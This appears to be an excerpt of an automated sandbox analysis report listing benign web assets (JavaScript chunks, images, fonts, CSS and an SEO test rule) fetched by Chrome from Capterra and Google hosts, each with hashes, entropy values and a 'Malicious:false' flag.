                                                                                                                                                                                                        Preview:var z1=Object.defineProperty,B1=Object.defineProperties;var H1=Object.getOwnPropertyDescriptors;var qs=Object.getOwnPropertySymbols;var Nh=Object.prototype.hasOwnProperty,kh=Object.prototype.propertyIsEnumerable;var qc=Math.pow,Oh=(e,t,n)=>t in e?z1(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,I=(e,t)=>{for(var n in t||(t={}))Nh.call(t,n)&&Oh(e,n,t[n]);if(qs)for(var n of qs(t))kh.call(t,n)&&Oh(e,n,t[n]);return e},H=(e,t)=>B1(e,H1(t));var fi=(e,t)=>{var n={};for(var r in e)Nh.call(e,r)&&t.indexOf(r)<0&&(n[r]=e[r]);if(e!=null&&qs)for(var r of qs(e))t.indexOf(r)<0&&kh.call(e,r)&&(n[r]=e[r]);return n};var m=(e,t,n)=>new Promise((r,o)=>{var i=l=>{try{a(n.next(l))}catch(c){o(c)}},s=l=>{try{a(n.throw(l))}catch(c){o(c)}},a=l=>l.done?r(l.value):Promise.resolve(l.value).then(i,s);a((n=n.apply(e,t)).next())});var Ys=typeof globalThis!="undefined"?globalThis:typeof window!="undefined"?window:typeof global!="undefined"?global:typeof self!="undefined"?self:{};function xf(e){return
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25600), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                        Entropy (8bit):5.448672016604878
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:RYzFZflJreLbrCS9h7vo/TMNt340KrExPdtS9p:eeLP7vobcSr
                                                                                                                                                                                                        MD5:48BE1563378F7C36BDADC0F2EB616856
                                                                                                                                                                                                        SHA1:2AA42B08FE8CC7AC0DC371D2309A38D5A465247F
                                                                                                                                                                                                        SHA-256:63C035E2F43180086B19EC08F35C8DEEE82B2B804DDFCF92F7F0E6D835957BFE
                                                                                                                                                                                                        SHA-512:6BD0492F48D247C598BB23CD41063A90C95B93AC491F80BB80FD755D004A2275CD04D0D456CDF618D70E344C74B6EA51FBD1EE3AFC62F68A91DA322A0BF9692F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[43],{"1Fob":function(t,e,r){"use strict";var n=new RegExp("%[a-f0-9]{2}","gi"),f=new RegExp("(%[a-f0-9]{2})+","gi");function decodeComponents(t,e){try{return decodeURIComponent(t.join(""))}catch(f){}if(1===t.length)return t;e=e||1;var r=t.slice(0,e),n=t.slice(e);return Array.prototype.concat.call([],decodeComponents(r),decodeComponents(n))}function decode(t){try{return decodeURIComponent(t)}catch(f){for(var e=t.match(n),r=1;r<e.length;r++)e=(t=decodeComponents(e,r).join("")).match(n);return t}}t.exports=function(t){if("string"!==typeof t)throw new TypeError("Expected `encodedURI` to be of type `string`, got `"+typeof t+"`");try{return t=t.replace(/\+/g," "),decodeURIComponent(t)}catch(e){return function customDecodeURIComponent(t){for(var r={"%FE%FF":"\ufffd\ufffd","%FF%FE":"\ufffd\ufffd"},n=f.exec(t);n;){try{r[n[0]]=decodeURIComponent(n[0])}catch(e){var i=decode(n[0]);i!==n[0]&&(r[n[0]]=i)}n=f.exec(t)}r["%C2"]="\ufffd";for(var o=Obj
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5450
                                                                                                                                                                                                        Entropy (8bit):7.956337780821994
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oHoLTTTFhx7oPIFKktOCwCfCUbaCV/g+nEYlfFLGFJAZFkhpPTqMc:oHoLTTTFfFQCwCfCUe+/gYCQ8GMc
                                                                                                                                                                                                        MD5:37F8A26AE58E9CC0938209D24AEA1698
                                                                                                                                                                                                        SHA1:274081C3DEAA3F8200978DA9574C1E2C8ADF329F
                                                                                                                                                                                                        SHA-256:0975D9A9ECD11B50FF959792440422F4C46234476D03DDC4FED38DD6016894E5
                                                                                                                                                                                                        SHA-512:721D2FA26C15356D2DD7938CB0FCFE7F2E678EF672A874A6FCB94044F3F3ACBF867703D83D96735F17F641C207E932D3AF94604971727F1D8C47638E10EEDE4F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.y.$E....YG..}2..3........rx.....x..c..A...F..(0....".d.....A....s..>.....M;]...U]]..m}^.1.'++.../~._..9.,>4..y.C^....:G...y.sD^....:G...y.sD^....:G...y.sD^....:G...y.sD^....:G...y.sD^.......,L..`.1.......J.4.V.V.A.L..c...>%...%..J...mr.%X.$.7..N.=..1...q..?.A.....iX..K...".RD+.t.*%.x...&.Oi..n..*.?Er.@cqtM..F..#..L..,.s..&(..dz.s.p....c.....kT....\..-W....J..)v.....P.'3c..M....5!z..|...u.8...".L.9z..+.ri)}....B)....W.\....*...m..5..5um.W.....g>.o.&.A.L.b.Ic.Q&z.....u.I5j..,w..;~{\.4,.C...._.......:n.....Q...+..*uI2...3._@>..X.io.`..`w..~.-[m...].|..T;.....{".c....,.M.3.3.....m.."!....D3.6...p.K.<.6<...V.n..>j....%U..kD.......4"dJY.......#...]K..W..w.2(..(.,_...t_[M.v.>.I....=.`w.3n.....L%1..9..6'.(.RH..B..S........1..P4;.....9..T*...1.....X..fU|{J4...?`.h.a....:.Ji.d].}1..=...x.%>.a1.J6...Ety..X@*..@%.:......D?...8.?.....1.hi..uI..b>....?....Q.:.m|yg|..o.|Y.....wV.1.dG.m........*s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):92674
                                                                                                                                                                                                        Entropy (8bit):5.288414419714851
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:aituX55DPfb/wFG26UtHnbTcCAC0dn4Bs9qatj9N+jpT:Z+hwFGme4nT
                                                                                                                                                                                                        MD5:16D7AE86E21434A32157D3226AC9BB77
                                                                                                                                                                                                        SHA1:6EAA4577EFA2568AA7752B00AA42523BDA14CA95
                                                                                                                                                                                                        SHA-256:6C9C6406C9BD9814CF84974221433003377B67F071EC5411FDDBCBA4EC109BCA
                                                                                                                                                                                                        SHA-512:818A9CBFACFBC15F382F286E9C5B3476C4F508B30F4DAD880309C586C8725C52CA43266E3B04912A9E0423D93DA15997F3EAE563542767EDA63321E1BCEC1DEB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[14],{"+WaJ":function(e,t,r){"use strict";function isFunction(e){return"function"===typeof e}r.d(t,"a",function(){return isFunction})},"/V3T":function(e,t,r){"use strict";var n=r("13WS"),o=function(e){function Action(t,r){return e.call(this)||this}return n.a(Action,e),Action.prototype.schedule=function(e,t){return void 0===t&&(t=0),this},Action}(r("LR82").a);r.d(t,"a",function(){return i});var i=function(e){function AsyncAction(t,r){var n=e.call(this,t,r)||this;return n.scheduler=t,n.work=r,n.pending=!1,n}return n.a(AsyncAction,e),AsyncAction.prototype.schedule=function(e,t){if(void 0===t&&(t=0),this.closed)return this;this.state=e;var r=this.id,n=this.scheduler;return null!=r&&(this.id=this.recycleAsyncId(n,r,t)),this.pending=!0,this.delay=t,this.id=this.id||this.requestAsyncId(n,this.id,t),this},AsyncAction.prototype.requestAsyncId=function(e,t,r){return void 0===r&&(r=0),setInterval(e.flush.bind(e,this),r)},AsyncAction.prototype.re
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                        Entropy (8bit):5.082852501526015
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YUv34GnsMoWJsDWNivdXixXEMGNp0jV291DaeY:YUv3YZWJsDAivJixVG8Q/DaH
                                                                                                                                                                                                        MD5:B3E7599B00B734AF0C60EEA76B30D368
                                                                                                                                                                                                        SHA1:79EEF5DDF3B1E4E3BACA195E3518D456C3001594
                                                                                                                                                                                                        SHA-256:C628B4C3E9AF889520A03118ED0B20304FEB330A1BD4CBBE518CCCDC140357A8
                                                                                                                                                                                                        SHA-512:AAFAC7933F67FE2330127D4C9C9FD00FE65D4D84CBDE4A45C6713B78790A36F3FEDEDA7283004646E8213BF11216E7D6713CBB0A5D4D9656C78CA3FB5416286F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://seoab.io/g/1edf9f48-375c-43f8-af0d-9773874beeb2/www.capterra.com/p/145471/Publicate/0.json?version=1.3.0
                                                                                                                                                                                                        Preview:{"rules": [{"REPLACE_CONTENT": {"css_selector": "title", "index": 0, "value": [{"type": "TEXT", "content": ""}, {"type": "CURR", "content": "current"}]}}], "variables": [], "url": "www.capterra.com/p/145471/Publicate", "_eid": "2fc7411f-86e8-4b44-9f61-d9ea46bd0fc1"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6857
                                                                                                                                                                                                        Entropy (8bit):7.52850667653302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:+7NoYNMtKwXaVnh2Xsrt8pc6zj7Kfl+2E:dYNg7XaNhvrt8pc6Xga
                                                                                                                                                                                                        MD5:71244545494085C2CD31CDD098C5E07B
                                                                                                                                                                                                        SHA1:555F24560C54A922D6B08B90D4CC103523E2C723
                                                                                                                                                                                                        SHA-256:20BDEF7A8DEBCBE8D119449240C28FA4B702DF4E782BFF6C82163E7EDA174778
                                                                                                                                                                                                        SHA-512:A5A7F4890AA089A3D71DC9969C0653F7A35EFAB54F37ACDFFE3378830EA3AFFEB02A44E68666D07A139307355CAFA50CA6BB22EF03E1A3788CF71D46011F95AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f94dcf3a-e9ef-4673-80a0-d25bd50a393d.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............+.................!...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16158), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16158
                                                                                                                                                                                                        Entropy (8bit):5.282357649306053
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:bUw7XCCeCbmO7g17ixKXvLvO7Sxng7UCyyO7k7bE67H:YUCCem5MzHxnnC8g
                                                                                                                                                                                                        MD5:C4915B4771DD5CC060DE08D60BE574C9
                                                                                                                                                                                                        SHA1:48AE1B10C5F165CE33F863E6A492241E76F4738A
                                                                                                                                                                                                        SHA-256:3F02F078B750ACE5DBFB11EFC92DEC520D2D6600240F0EA7BD8662631FA476DC
                                                                                                                                                                                                        SHA-512:2F1336AF0CB9FB0C6EF0EE16A6F3A56024B0800DDDB8940F02D34842A7E975B663914D35EAD2C9BCF0A2D2B2F5CD28C5C10B810EB32FD8F9D7091DC01F05F28D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/2780-02a6d62071d518f1.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2780],{62780:function(e,t,r){r.d(t,{Oo:function(){return B},dy:function(){return W},ew:function(){return A},tl:function(){return O},ZF:function(){return u}});var n=r(7653),a=r(96890),o=r(10803),l=r(57908),i=["children","className","color","isInteractive","onClick","onChange","size","total","value","typography"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}function s(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=Array(t);r<t;r++)n[r]=e[r];return n}var u=(0,n.forwardRef)(function(e,t){var r,u=e.children,f=e.className,m=e.color,p=e.isInteractive,d=e.onClick,v=e.onChange,y=e.size,b=e.total,g=e.value,h=void 0===g?0:g,O=e.typography,j=function(e,t){if(null==e)return{};var r,n,a=function(e,t){if(null==e)return{};var r,n,a={},o=Object.ke
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 45300, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):45300
                                                                                                                                                                                                        Entropy (8bit):7.99526293185803
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:XNcHdvw7wbeW4t3x3dcjsflPt8YCRzGzgI/gBPaKkqnMMUQAbc6VBhXGGVJM/:XNmdvw73NAIlPtZCRzGzg+QPaKkqnMMv
                                                                                                                                                                                                        MD5:5FE660C3A23B871807B0E1D3EE973D23
                                                                                                                                                                                                        SHA1:62A9DD423B30B6EE3AB3DD40D573545D579AF10A
                                                                                                                                                                                                        SHA-256:E13FFA988BE59CBF299D7FF68F019F902B60848203AC4990819EB7E4624EE52D
                                                                                                                                                                                                        SHA-512:9EB08055BEFC2B70CC8BBA34496F14414EA32F5B97F185D357F100EA7D74BFDC12AFD815A53E629D02A53DC7F3E37096DF8BBBD36AB44A011C1A4288B42780CD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
                                                                                                                                                                                                        Preview:wOF2..............}...............................>..H.`..D.6........ ..8..R...\.6.$.. . .....|..*[.lqE.6C...&..^.....n...qM~..|.8f*.<...{>F......d.u.y..J!.......d.[N.9........;..i.[..+.I.Y....+||!.rU7...G..2..+k..n&..L.`.g.....c4{..U.........F...DS.f.PY..........S..vY..Wl..BzME.D.~.M......t.y..@.1.....DD.....5.\.^...dy..*.'.,*......0....~..c~.#".=.].}A..mA...>.V.*.....,Lu.....]s..p.T{..%0....QS,.O.>......Av.+lE~....L!..B..*[E...S..L9.'^..K.g.....O..6A...r..#W....."rT..{]-+{.v*[vgO.iO..>k..s.N5e..M........U3@..i.(.w....[pu*|.....($.)..-..lA.....dW.hz.P.v,..15....1.....@..@.q.t.'E..bI........$..P.$NQv...s..e..= C3..!......6...M$:..G...{..hX.AfM..$.w....A.r....o?.......Y...s.C.r......w.j...]RSh.iR..}%5%5%u.r.Em[..b%Vsz.....J..;%.]..!..O........D.....?.D)d.......|.|.P.X....{..K...2.9..q:..U..n.......$.R...l.tLi..^.f-%..O.6..iJ.).&.;....T3..~o" -t;.....:.)....q.[`. .......Fk...Z.Ty....w.e'...t\... .><...9.U0\./....4.IS.h:x..t...m.;..$t.m`e..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5957
                                                                                                                                                                                                        Entropy (8bit):7.421692244587882
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jv5N26MT0D5MdtbZPAVwzVJ1u2s0Qk01+W67PgFGxA:+7joYNMtKwX1u2sZp67PT2
                                                                                                                                                                                                        MD5:6959F2DB1543C9AB0A76D5B309D9CE40
                                                                                                                                                                                                        SHA1:413307509449C298CCDB5B5CA59B28FC72B3438E
                                                                                                                                                                                                        SHA-256:3753084CA8337F8D203D7FE8555BABE864C437934C873ED8F64B9B7C840EA6CD
                                                                                                                                                                                                        SHA-512:821B84971CDEA548B598DB065A7288DEE9FFA29AD4D257758B6892A67E2B56B222386509853C8EAF56C36C000D3EB798883BE8A71E9664097234AE6F661D95E1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f0d90c26-fb48-482e-bfed-fd16809bc437.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............$...!.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...V....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 128x72, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6017
                                                                                                                                                                                                        Entropy (8bit):7.531700212172393
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:uN26MT0D5MdtbZPAVwzV+ciEDHQE678DL03eFJG/Xff2LhAUJ+ZwD+utuLeD:hYNMtKwtiywdML0Ow2Lhh+ZguSD
                                                                                                                                                                                                        MD5:B7FF1E31F979B802A8A28FF6E3F7D168
                                                                                                                                                                                                        SHA1:63B3C8C338A986A101C59822493CBB4C995BE82F
                                                                                                                                                                                                        SHA-256:3BF38F50C826EB12F1CEF48E4104B35C72C99695D2C3816D222CDBE8CE74343C
                                                                                                                                                                                                        SHA-512:C3BD0CD417284C6C9242F2157082D81AA256BF1E2BB074E6E5DD23BBA42A93B369BAE87B4B7228C72C5BD047CD789094FE34DD212C7D1C39990B194D2CF75CDB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 822052
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):180597
                                                                                                                                                                                                        Entropy (8bit):7.998427219843883
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ykItTN5nZ+fFbhf7TcwQT1VTwWbD2YDT/4BfDYkL6BaTi8Uybgpf7tpoNuBeTa4f:GTNN0bhfUw0xlbD2YABDLL6QPsx7XoNV
                                                                                                                                                                                                        MD5:217DB78D093B259BA6CB3ACDC68C2FE6
                                                                                                                                                                                                        SHA1:F8F0570BF11A662A2ABAD3B14A15952B9B5D6728
                                                                                                                                                                                                        SHA-256:9E3BECA8AE6FD78C563AB2674D1661E8395A370CABF52D7D927BD59B5641D09B
                                                                                                                                                                                                        SHA-512:E5990B74FCF1826A98274A94C8EFB021EEACEEDF1AD6B5D2F10F60C2E6E579546F9624994026887558E90B467CA705A297C172AC228B985B60DD3CC48A3C542A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:...........{w.G.7.....2.Gz..t].&...q.y.......j.mKA.#.26....w..I ...XjU.v............L.5..Mg.x1.N..Q.S.<I..Y<N...'I..._.....?<}.,.,.....s..r.G.v..2.Y.;.'..........9...6.}.r.9......_.VO..W6%N.....]1..Hi.W.d./...D(.F...d<\.D...v.6.i{aZLv...3K....5i'.U..o.....&.=.....$....f.Y...O.g..prj...........[....,...8..i..:z..O.._..........w-;Y.../^....z.[....._....g..=uf.|:ZR.........)..OwyrW....2..Vm:i..G.....(z.Y;9.^H..#[..3/&.... .#W...<{.=_QUA..E?.^xB..V.0.E^....A.B~q.....#[.W.I.....d.i;...e..*..T._$..gB..y.5cI.H?...SJ..k..k.O..T.....Vr.w.....F...W.G...p...E>.B+.m..._..1H!i...f..yU~(}.........4."H...g..nd.R...yU.U..QC.E>B...a.../.zD.G%...._M....R.i{.............M0$..8_.....}a.n\.H...t.<...OR.6.4=_l!hBl........<)..h.C.7.\..".b....... ...)....>.(.C...f..hW..-..|g..(W....Y....C..C)L.y......"...E.......U.Y...Q:.. /!....K{.(.."..9.L^..{%#m.(2.}.."M....z..Aw..bJ....e........k.P/...gS..d6...I....g1H&.v.p......1U.%.....b..x4j'..gd[t.q|.8I..w..,.S[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):533
                                                                                                                                                                                                        Entropy (8bit):4.933115570682282
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:X5eNcBWFXMOYEBAP5egtIzVWRwHjXJqIK+qIKzg0fUsq5eK:pemBkXWegazdDZq3+q3c08sceK
                                                                                                                                                                                                        MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                                                        SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                                                        SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                                                        SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://accounts.google.com/gsi/style
                                                                                                                                                                                                        Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23149), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23149
                                                                                                                                                                                                        Entropy (8bit):5.075511542663716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:rtE6lh9sj56lNDM4cSmbmpcNQtfYA2ghL9ivuEesrSytJwevkMQVkHKxiSgX:rtzL9yMOQtQ49iYrytJwBhgX
                                                                                                                                                                                                        MD5:8ADD19CA3678CB8B4622720416FA7105
                                                                                                                                                                                                        SHA1:26153195BCDAEFBDF66B4F939A32A34C04EF1803
                                                                                                                                                                                                        SHA-256:A33721F354E78CBBA8FC8FEB81A57A26917C38270A53A95FA37EFBD9F66B1F43
                                                                                                                                                                                                        SHA-512:5421CF2908D6B03D5755E77433C1CA9BC787BDF2D393B54E31165BA39DFC338F2E70717DE516AA23A26ED95E0C048F5AE0F8987E8BA57BEEC1C0B39CED10398F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8278],{7663:function(e,a,t){t.r(a);var r=t(27573),o=t(80978);a.default=e=>{let{id:a,mobileTop:t="132",desktopTop:n="200"}=e,{deviceType:s}=(0,o.h)();return(0,r.jsx)("div",{className:"invisible relative block h-0",id:a,style:{top:"mobile"===s?"-".concat(t,"px"):"-".concat(n,"px")},children:"Tabset anchor"})}},20300:function(e,a,t){t.d(a,{default:function(){return f}});var r=t(27573),o=t(38458),n=t(57908),s=t(34617),i=t(7653),l=t(67604),c=t(20857);let m=(e,a)=>e>=a?a-a%2:e;var f=e=>{let a,{linkList:t,viewMoreBtnText:f,maxNumberOfLinks:d=20,showAllLinks:w=!1,viewMoreBtnEvent:u}=e,[g,p]=(0,i.useState)(w),{deviceType:v}=(0,c.hU)();return a="mobile"===v?g?m(t.length,d):5:m(t.length,d),(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)("ul",{className:"py-2xl md:gap-x-4xl mx-auto grid w-[90%] grid-cols-1 md:grid-cols-2",children:t.slice(0,a).map((e,a)=>{let{href:t,text:i,hasGA4:l,event:c}=e;return(0,r.jsx)("li",{"data-testid":"link
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1121
                                                                                                                                                                                                        Entropy (8bit):6.894515040682796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+zxYjqcNzB08P8TPZrC44PncXItiyDW0oVzmECLMHC3DO:+zxYjqcNi8PaRrqPcXIgeWJHCLMHCTO
                                                                                                                                                                                                        MD5:720CF8E1BCCA63CA019DBBF339E4DC9F
                                                                                                                                                                                                        SHA1:178FC94280748D97028BEE71AE1C4AF639EB3247
                                                                                                                                                                                                        SHA-256:6FEE0EBF405C6BAA312B5439E3C6DF3E66A1985716C2A3DB42EB1A6B57DDE28E
                                                                                                                                                                                                        SHA-512:9211FF58CD1E47522EA76822D40CF00259D10178BF13041652E25A4D3FBA909379FD760D4D3BBA4B5AA7BD06CD3C2AA1247D32DFA1005101F3D1D221F97ED169
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/b2520648-b79c-4e03-98c1-8ad16b374420.png?auto=format%2Ccompress&fit=max&w=96&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...`....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat........aP2.D<....1..l....n..:P........`...B2..D<.0..@./F...u....e@.D..UmzOy.U.;..... q.aq......<.p.....-......#...%k...}.-.5.`......./..x...&.R...O......1.5.{Z...A..I..&d..PX.MMr.d.]]..qHu.s]w>..z..a.....52.).1..!..<.....A..I.e.....`G.~.o$.%o..I[...._..k..c...|.......t.jX...j..n.".q,<.fKW.H......n?.n..+.H.?1u5Y.../.I\//..2..,@.r....z.3N1.l.._......@.Va....]...^.W...`...2d..f`M..P)..l...H.[P.....rD&.....F9.......].yY.../..AD.....jIy....l2..H.'.....=)..+.....o.h.u<..Bc[y...._.5..?``..uIL.......7...D......7+.l.z.p.=.3..,.U.../.,u..'.;6t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
